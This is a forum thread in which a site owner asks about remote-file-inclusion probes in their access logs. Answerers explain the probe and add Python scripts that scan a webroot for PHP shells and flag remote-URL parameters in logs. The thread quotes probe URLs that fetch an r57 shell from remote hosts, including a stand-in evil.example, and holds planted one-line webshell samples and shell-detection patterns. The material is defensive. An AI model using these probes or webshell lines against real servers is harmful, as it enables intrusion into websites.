Suspicious Network Protocol Activity

Hi, I found the following lines in the access logs for two of my sites...

site1.com...
179.222.149.150 - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 200 31476 "-" "Mozilla/3.0 (compatible; Indy Library)"

site2.com...
179.222.149.150 - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"
179.222.149.150 - - [15/Oct/2013:03:02:14 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"

What is the attacker trying to do? Are they trying to upload the r57 file to my server? I searched for it but it's not there.
killdurst asked:

Zephyr ICT (Cloud Architect) commented:
I think it was someone looking for something like this:

http://www.malangteam.com/2010/06/16/find-r57-and-c99-shells-hidden-inside-php-and-txt-files/

Since I only see GET commands, we can assume they were not uploading something.
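The link above describes hunting for r57/c99 shells that have been parked in .php and .txt files. As an added example (not code from the thread or from the linked article), here is a small Python scanner that walks a document root, including dot-files, and flags files that carry the marker strings those shells are known for, the generic "decode then eval" and "execute whatever the request says" constructs they rely on, or PHP code hidden under a non-PHP extension such as .txt or .jpg. The marker list is my own assumed heuristic set, not an authoritative signature database, and the demo webroot it builds is constructed (three tiny files, none of them a real shell).

```python
import os
import re
import tempfile
from pathlib import Path

# Heuristic markers for the well-known PHP shells and for the generic "decode and eval"
# or "run whatever the request says" patterns they rely on. Assumed set, not exhaustive.
SHELL_MARKERS = [
    ("r57", re.compile(rb"r57\s*shell", re.I)),
    ("c99", re.compile(rb"c99\s*shell", re.I)),
    ("eval-decode", re.compile(
        rb"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("exec-from-request", re.compile(
        rb"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b",
        re.I)),
    ("preg-e-modifier", re.compile(
        rb"\bpreg_replace\s*\(\s*['\"][^'\"]*?/[imsxu]*e[imsxu]*['\"]", re.I)),
]
PHP_OPEN_TAG = re.compile(rb"<\?php\b|<\?=")
# Extensions under which PHP code has no business appearing; shells are often parked
# as .txt (to be pulled in by a remote-include probe) or disguised as images.
NON_PHP_EXTENSIONS = {".txt", ".jpg", ".jpeg", ".png", ".gif", ".ico", ".css"}
MAX_BYTES = 2 * 1024 * 1024  # read at most this much of any one file


def scan_file(path: Path) -> list[str]:
    """Return the list of marker names found in one file (empty if it looks clean)."""
    with path.open("rb") as fh:
        data = fh.read(MAX_BYTES)
    findings = [name for name, pattern in SHELL_MARKERS if pattern.search(data)]
    if path.suffix.lower() in NON_PHP_EXTENSIONS and PHP_OPEN_TAG.search(data):
        findings.append("php-in-non-php-file")
    return findings


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Walk a document root (os.walk lists dot-files too) and return
    {relative_path: [markers]} for every file that triggered at least one marker."""
    results: dict[str, list[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            full = Path(dirpath) / filename
            if full.is_symlink():
                continue
            findings = scan_file(full)
            if findings:
                results[full.relative_to(root).as_posix()] = findings
    return results


def build_demo_webroot() -> Path:
    """Create a constructed, throw-away document root with one clean file and two planted
    samples so the scanner can be run offline. Nothing here is a real shell."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_bytes(b'<?php echo "hello"; ?>\n')
    (root / "r57.txt").write_bytes(
        b'<?php /* r57shell (planted sample) */ eval(base64_decode($_POST["c"])); ?>\n')
    (root / "cache").mkdir()
    (root / "cache" / ".x.php").write_bytes(b'<?php system($_GET["cmd"]); ?>\n')
    return root


if __name__ == "__main__":
    demo = build_demo_webroot()
    for rel, markers in sorted(scan_webroot(demo).items()):
        print(f"{rel}: {', '.join(markers)}")
```

Run it against a real document root with `scan_webroot(Path("/var/www/site1"))`; anything it reports is a lead to inspect by hand, not proof of compromise, and a clean result does not rule out a shell that uses none of these markers.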

killdurst (Author) commented:
Assuming that the r57.txt at coopere.coop.br used by the attacker is identical to the one at "http://www.r57shell.net/shell/r57.txt", what kind of response did the attacker get when he executed the following URL?

http://www.site1.com/index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt?

I executed the following command in my browser and the homepage uploaded correctly.
http://www.site1.com/index.php?option=http://www.r57shell.net/shell/r57.txt?

Note that "site1.com" is fictional in this case.
Zephyr ICT (Cloud Architect) commented:
I'm not sure what it does exactly; usually option= is used for views, I think ...

You could test it in a secured environment (e.g. a virtual machine). I would do it, but I'm at work and don't have access to one.

It could just download the file or it might just give an error 404 page not found.

In your test it probably just went to the front page because it couldn't find the option?

Maybe some other expert can give more insight in the web part?

Did you use the website's tips to search for the files on your server? I know you already searched for it and couldn't find anything; just making sure.
Dave Howe (Software and Hardware Engineer) commented:
What they are trying to do is test for a relay vulnerability in your index.php: specifically, that it will download a file from the FTP site specified in the option argument. Assuming this isn't the case, you can safely ignore it as the sort of Internet background scanning that goes on all the time, but DO check that this is the case first, though :)
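The answer above describes the probe (make index.php fetch a file from the host named in `option=`) and the caveat that it is harmless only if your application does not do that. As an added example, not code from the thread, the following Python script turns that into a triage over access-log lines in the combined format shown in the question: it decodes each query parameter (repeatedly, to catch percent-encoded probes), flags values that are a remote URL or a PHP stream wrapper, records whether the URL embeds credentials and ends in a stray `?` (a common trick to neutralise any suffix such as `.php` that the application appends before including), and separates 404s, which never reached a handler, from 200s that still need a manual check. The two log lines from the question are embedded as-is; the other two (a normal Joomla-style request and a percent-encoded probe against `evil.example`) are constructed for contrast, and the scheme list and the trailing-`?` heuristic are my own assumptions about what a probe looks like.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, unquote, urlsplit

# Log lines in Apache/nginx "combined" format. The first two are the ones from the
# question; the last two are constructed (normal request, percent-encoded probe).
SAMPLE_LOG = """\
179.222.149.150 - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 200 31476 "-" "Mozilla/3.0 (compatible; Indy Library)"
179.222.149.150 - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option=ftp://coopere:123456@coopere.coop.br/www/r57.txt? HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"
10.0.0.5 - - [15/Oct/2013:03:10:00 +0800] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.6 - - [15/Oct/2013:03:11:00 +0800] "GET /index.php?option=http%3A%2F%2Fevil.example%2Fc99.txt%3F HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Schemes and PHP stream wrappers that have no business being the value of a parameter
# that names a local component, view or template (assumed list, extend as needed).
REMOTE_RE = re.compile(r"^(?P<scheme>https?|ftps?|php|data|expect|phar|file)\s*:", re.I)


@dataclass
class RfiHit:
    ip: str
    timestamp: str
    path: str
    param: str
    scheme: str
    host: str               # remote host the application would have been asked to fetch from
    has_credentials: bool   # user:pass@ embedded in the URL
    trailing_qmark: bool    # value ends in '?': swallows any suffix the app appends, e.g. '.php'
    status: int


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so a double-encoded http%253A%252F%252F is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_params(target: str):
    """Yield (param, decoded_value, scheme) for every query parameter that points off-box."""
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw).strip()
        m = REMOTE_RE.match(value)
        if m:
            yield name, value, m.group("scheme").lower()


def scan_log(text: str) -> list[RfiHit]:
    """Parse combined-format lines and return one RfiHit per remote-looking parameter."""
    hits: list[RfiHit] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        for param, value, scheme in remote_params(target):
            remote = urlsplit(value)
            hits.append(RfiHit(
                ip=m.group("ip"),
                timestamp=m.group("ts"),
                path=urlsplit(target).path,
                param=param,
                scheme=scheme,
                host=remote.hostname or "",
                has_credentials=remote.username is not None,
                trailing_qmark=value.endswith("?"),
                status=int(m.group("status")),
            ))
    return hits


def needs_manual_check(hit: RfiHit) -> bool:
    """A 404 means the probe never reached a handler. A 200 only proves the application
    answered; it says nothing about whether the remote file was fetched or executed."""
    return hit.status == 200


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        verdict = "CHECK index.php by hand" if needs_manual_check(hit) else "no handler reached"
        print(f"{hit.timestamp} {hit.ip} {hit.path}?{hit.param}= {hit.scheme}://{hit.host} "
              f"creds={hit.has_credentials} trailing?={hit.trailing_qmark} "
              f"status={hit.status} -> {verdict}")
```

Feed it a real log with `scan_log(open("/var/log/apache2/access.log").read())`. The manual check itself is the one the answer calls for: confirm that nothing in index.php (or the component it dispatches to) passes `$_GET['option']` to `include`, `require`, `file_get_contents` or a similar call without first matching it against a fixed list of local names.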
Zephyr ICT (Cloud Architect) commented:
"What they are trying to do is test for a relay vulnerability in your index.php"

That's what I figured as well ... But wasn't sure, thanks for clarifying.